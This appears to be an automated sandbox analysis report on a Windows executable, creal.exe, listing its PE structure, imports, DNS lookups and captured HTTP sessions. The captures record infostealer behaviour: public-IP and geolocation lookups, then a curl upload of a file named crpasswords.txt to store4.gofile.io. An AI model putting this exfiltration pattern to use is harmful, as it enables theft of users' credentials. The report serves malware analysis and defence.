                                                                                                                                                                                                              Entrypoint:0x14000c2f0
                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                              Time Stamp:0x66F02D25 [Sun Sep 22 14:43:49 2024 UTC]
                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                                                              OS Version Minor:2
                                                                                                                                                                                                              File Version Major:5
                                                                                                                                                                                                              File Version Minor:2
                                                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                                                              Subsystem Version Minor:2
                                                                                                                                                                                                              Import Hash:1af6c885af093afc55142c2f1761dbe8
                                                                                                                                                                                                              Instruction
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3cee4 | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x46000 | 0xf41c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x42000 | 0x22c8 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x56000 | 0x758 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3a420 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3a2e0 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2b000 | 0x420 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x29d90 | 0x29e00 | 15c814a42215e290d8bab54e3db4f28e | False | 0.5531133395522388 | data | 6.488360740396217 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2b000 | 0x12d0c | 0x12e00 | 377d3e0f7c95bb22c4f7a316a5b04f1b | False | 0.5158319536423841 | data | 5.820062241150467 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x3348 | 0xe00 | e1f21cabb4e5e084c6e11e610d715023 | False | 0.13253348214285715 | Matlab v4 mat-file (little endian) f\324\377\3772\242\337-\231+, text, rows 4294967295, columns 0 | 1.8227234993173287 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x42000 | 0x22c8 | 0x2400 | b142de92a6283807ff34839c180f053c | False | 0.4743923611111111 | data | 5.326103127679494 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA | 0x45000 | 0x15c | 0x200 | ee29821d11e5dd21c3e807a502fa5813 | False | 0.38671875 | data | 2.83326547900447 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x46000 | 0xf41c | 0xf600 | c654ab5a3bc06ebf8c554f36c31153c0 | False | 0.8030837144308943 | data | 7.554967714213712 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x56000 | 0x758 | 0x800 | 7813f7270f60606010808eaa88aee14b | False | 0.5439453125 | data | 5.24418466384704 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x46208 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 |  |  | 0.585820895522388
RT_ICON | 0x470b0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 |  |  | 0.7360108303249098
RT_ICON | 0x47958 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 |  |  | 0.755057803468208
RT_ICON | 0x47ec0 | 0x952c | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |  |  | 0.9975384937676757
RT_ICON | 0x513ec | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 |  |  | 0.3887966804979253
RT_ICON | 0x53994 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 |  |  | 0.49530956848030017
RT_ICON | 0x54a3c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 |  |  | 0.7207446808510638
RT_GROUP_ICON | 0x54ea4 | 0x68 | data |  |  | 0.7019230769230769
RT_MANIFEST | 0x54f0c | 0x50d | XML 1.0 document, ASCII text |  |  | 0.4694508894044857
DLL | Import
USER32.dll | CreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll |
KERNEL32.dll | IsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, CreateSymbolicLinkW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetCPInfo, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
ADVAPI32.dll | OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll | SelectObject, DeleteObject, CreateFontIndirectW
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                              Jan 16, 2025 09:09:21.579111099 CET4434980131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:21.900036097 CET4434980131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:21.900099993 CET4434980131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:21.900227070 CET49801443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:21.909840107 CET49801443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:21.909851074 CET4434980131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.152545929 CET49813443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.152569056 CET4434981331.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.153104067 CET49813443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.167608976 CET49813443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.167622089 CET4434981331.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.812155008 CET4434981331.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.812227011 CET49813443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.813858032 CET49813443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.813880920 CET4434981331.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.814121962 CET4434981331.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.816636086 CET49813443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.816726923 CET49813443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:22.816749096 CET4434981331.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:23.417947054 CET4434981331.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:23.418010950 CET4434981331.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:23.418251991 CET49813443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:23.426465988 CET49813443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:23.426472902 CET4434981331.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.154514074 CET49883443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.154580116 CET44349883104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.154666901 CET49883443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.155741930 CET49883443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.155769110 CET44349883104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.639352083 CET44349883104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.640125036 CET49883443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.640189886 CET44349883104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.643965006 CET44349883104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.644045115 CET49883443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.646075964 CET49883443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.646334887 CET44349883104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.646361113 CET49883443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.691346884 CET44349883104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.692069054 CET49883443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.692095995 CET44349883104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.738936901 CET49883443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.935204983 CET44349883104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.935400963 CET44349883104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.935853004 CET49883443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.936039925 CET49883443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.937314034 CET49889443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.937340021 CET4434988945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.937493086 CET49889443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.937911034 CET49889443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:34.937923908 CET4434988945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.569020033 CET4434988945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.569500923 CET49889443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.569518089 CET4434988945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.571129084 CET4434988945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.571185112 CET49889443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.572510958 CET49889443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.572603941 CET4434988945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.572792053 CET49889443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.572798014 CET4434988945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.613935947 CET49889443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.820374012 CET4434988945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.820549965 CET4434988945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.820638895 CET49889443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.826900005 CET49889443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.827884912 CET49895443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.827924013 CET44349895159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.828660965 CET49895443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.828977108 CET49895443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:35.828991890 CET44349895159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.658536911 CET44349895159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.658982038 CET49895443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.658993959 CET44349895159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.659920931 CET44349895159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.659976959 CET49895443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.661403894 CET49895443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.661468029 CET44349895159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.661621094 CET49895443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.661629915 CET44349895159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.707799911 CET49895443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.851468086 CET44349895159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.851650000 CET44349895159.89.102.253192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.851833105 CET49895443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:36.858282089 CET49895443192.168.2.9159.89.102.253
                                                                                                                                                                                                              Jan 16, 2025 09:09:37.497226000 CET49911443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:37.497272015 CET4434991131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:37.497327089 CET49911443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:37.513622999 CET49911443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:37.513643980 CET4434991131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.139780045 CET4434991131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.139961958 CET49911443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.141330957 CET49911443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.141360044 CET4434991131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.141576052 CET4434991131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.143964052 CET49911443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.143995047 CET49911443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.144042969 CET4434991131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.739506006 CET4434991131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.739602089 CET4434991131.14.70.245192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.739664078 CET49911443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.750478983 CET49911443192.168.2.931.14.70.245
                                                                                                                                                                                                              Jan 16, 2025 09:09:38.750504971 CET4434991131.14.70.245192.168.2.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 16, 2025 09:09:16.186455011 CET | 59480 | 53 | 192.168.2.9 | 1.1.1.1
Jan 16, 2025 09:09:16.193253040 CET | 53 | 59480 | 1.1.1.1 | 192.168.2.9
Jan 16, 2025 09:09:16.814632893 CET | 58850 | 53 | 192.168.2.9 | 1.1.1.1
Jan 16, 2025 09:09:16.821820021 CET | 53 | 58850 | 1.1.1.1 | 192.168.2.9
Jan 16, 2025 09:09:17.721865892 CET | 65229 | 53 | 192.168.2.9 | 1.1.1.1
Jan 16, 2025 09:09:17.730237961 CET | 53 | 65229 | 1.1.1.1 | 192.168.2.9
Jan 16, 2025 09:09:19.389302969 CET | 51672 | 53 | 192.168.2.9 | 1.1.1.1
Jan 16, 2025 09:09:19.397696972 CET | 53 | 51672 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 16, 2025 09:09:16.186455011 CET | 192.168.2.9 | 1.1.1.1 | 0x95c8 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Jan 16, 2025 09:09:16.814632893 CET | 192.168.2.9 | 1.1.1.1 | 0x1555 | Standard query (0) | api.gofile.io | A (IP address) | IN (0x0001) | false
Jan 16, 2025 09:09:17.721865892 CET | 192.168.2.9 | 1.1.1.1 | 0x55ac | Standard query (0) | geolocation-db.com | A (IP address) | IN (0x0001) | false
Jan 16, 2025 09:09:19.389302969 CET | 192.168.2.9 | 1.1.1.1 | 0x859a | Standard query (0) | store4.gofile.io | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 16, 2025 09:09:06.202106953 CET | 1.1.1.1 | 192.168.2.9 | 0x978a | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | azurefd-t-fb-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 16, 2025 09:09:06.202106953 CET | 1.1.1.1 | 192.168.2.9 | 0x978a | No error (0) | azurefd-t-fb-prod.trafficmanager.net | dual.s-part-0017.t-0009.fb-t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 16, 2025 09:09:06.202106953 CET | 1.1.1.1 | 192.168.2.9 | 0x978a | No error (0) | dual.s-part-0017.t-0009.fb-t-msedge.net | s-part-0017.t-0009.fb-t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 16, 2025 09:09:06.202106953 CET | 1.1.1.1 | 192.168.2.9 | 0x978a | No error (0) | s-part-0017.t-0009.fb-t-msedge.net | | 13.107.253.45 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 09:09:16.193253040 CET | 1.1.1.1 | 192.168.2.9 | 0x95c8 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 09:09:16.193253040 CET | 1.1.1.1 | 192.168.2.9 | 0x95c8 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 09:09:16.193253040 CET | 1.1.1.1 | 192.168.2.9 | 0x95c8 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 09:09:16.821820021 CET | 1.1.1.1 | 192.168.2.9 | 0x1555 | No error (0) | api.gofile.io | | 45.112.123.126 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 09:09:16.821820021 CET | 1.1.1.1 | 192.168.2.9 | 0x1555 | No error (0) | api.gofile.io | | 51.91.7.6 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 09:09:17.730237961 CET | 1.1.1.1 | 192.168.2.9 | 0x55ac | No error (0) | geolocation-db.com | | 159.89.102.253 | A (IP address) | IN (0x0001) | false
Jan 16, 2025 09:09:19.397696972 CET | 1.1.1.1 | 192.168.2.9 | 0x859a | No error (0) | store4.gofile.io | | 31.14.70.245 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                              • api.ipify.org
                                                                                                                                                                                                              • api.gofile.io
                                                                                                                                                                                                              • geolocation-db.com
                                                                                                                                                                                                              • store4.gofile.io
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49763 | 104.26.13.205 | 443 | 7612 | C:\Users\user\Desktop\creal.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 08:09:16 UTC | 117 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                              Host: api.ipify.org
                                                                                                                                                                                                              User-Agent: Python-urllib/3.12
                                                                                                                                                                                                              Connection: close
2025-01-16 08:09:16 UTC | 423 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Thu, 16 Jan 2025 08:09:16 GMT
                                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                                              Content-Length: 12
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 902c9f57bde282ed-IAD
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=7112&min_rtt=7104&rtt_var=2680&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=709&delivery_rate=407195&cwnd=32&unsent_bytes=0&cid=5d1c52e20736cd7f&ts=155&x=0"
2025-01-16 08:09:16 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                                              Data Ascii: 8.46.123.189


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49769 | 45.112.123.126 | 443 | 7612 | C:\Users\user\Desktop\creal.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 08:09:17 UTC | 126 | OUT | GET /getServer HTTP/1.1
                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                              Host: api.gofile.io
                                                                                                                                                                                                              User-Agent: Python-urllib/3.12
                                                                                                                                                                                                              Connection: close
2025-01-16 08:09:17 UTC | 1146 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx/1.27.1
                                                                                                                                                                                                              Date: Thu, 16 Jan 2025 08:09:17 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Content-Length: 14
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                              Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                              Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                                                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                              Origin-Agent-Cluster: ?1
                                                                                                                                                                                                              Referrer-Policy: no-referrer
                                                                                                                                                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                              X-DNS-Prefetch-Control: off
                                                                                                                                                                                                              X-Download-Options: noopen
                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                              ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow
2025-01-16 08:09:17 UTC | 14 | IN | Data Raw: 65 72 72 6f 72 2d 6e 6f 74 46 6f 75 6e 64
                                                                                                                                                                                                              Data Ascii: error-notFound


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49775 | 159.89.102.253 | 443 | 7612 | C:\Users\user\Desktop\creal.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 08:09:18 UTC | 140 | OUT | GET /jsonp/8.46.123.189 HTTP/1.1
                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                              Host: geolocation-db.com
                                                                                                                                                                                                              User-Agent: Python-urllib/3.12
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              2025-01-16 08:09:18 UTC206INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                              Date: Thu, 16 Jan 2025 08:09:18 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                              2025-01-16 08:09:18 UTC172INData Raw: 61 31 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 37 2e 37 35 31 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 37 2e 38 32 32 2c 22 49 50 76 34 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: a1callback({"country_code":"US","country_name":"United States","city":null,"postal":null,"latitude":37.751,"longitude":-97.822,"IPv4":"8.46.123.189","state":null})0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49788 | 31.14.70.245 | 443 | 748 | C:\Windows\System32\curl.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 08:09:20 UTC | 198 | OUT | POST /uploadFile HTTP/1.1
Host: store4.gofile.io
User-Agent: curl/7.83.1
Accept: */*
Content-Length: 193
Content-Type: multipart/form-data; boundary=------------------------069d07de67658548
2025-01-16 08:09:20 UTC | 193 | OUT | Data Ascii: --------------------------069d07de67658548Content-Disposition: form-data; name="file"; filename="crpasswords.txt"Content-Type: text/plain--------------------------069d07de67658548--
2025-01-16 08:09:20 UTC | 449 | IN | HTTP/1.1 200 OK
Server: nginx/1.27.1
Date: Thu, 16 Jan 2025 08:09:20 GMT
Content-Type: application/json
Content-Length: 747
Connection: close
